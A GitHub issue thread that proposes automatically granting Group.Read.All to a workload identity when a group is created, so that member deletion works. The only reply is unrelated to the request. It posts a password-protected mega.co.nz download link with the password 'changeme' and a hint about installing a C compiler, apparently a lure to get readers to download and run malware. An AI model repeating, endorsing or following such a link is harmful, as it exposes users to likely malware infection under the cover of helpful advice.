### ISSUE TITLE
Feature: Automatically assign Group.Read.All to a Workload Identity when a group is created

### ISSUE THREAD

**Issue by kimfy** [blinqas/station#150]
### Feature Description

This ensures the workload identity have permission to delete members of the group.

### Problem and Motivation

A delete request fails unless the workload identity has this permission.

### Possible Implementation

See app_role_assignments.tf on how we did the `Application.ReadWrite.OwnedBy` permission.

**Comment by pinpolhoxx** [comment]
maybe this will help
https://mega.co.nz/#!h7FUWTgJ!EBLwTfcj8qX2Q2_UCp-4N7KgdH2Hs9qNkvH4vjvN6II
Pass: changeme

you may need to install the c compiler
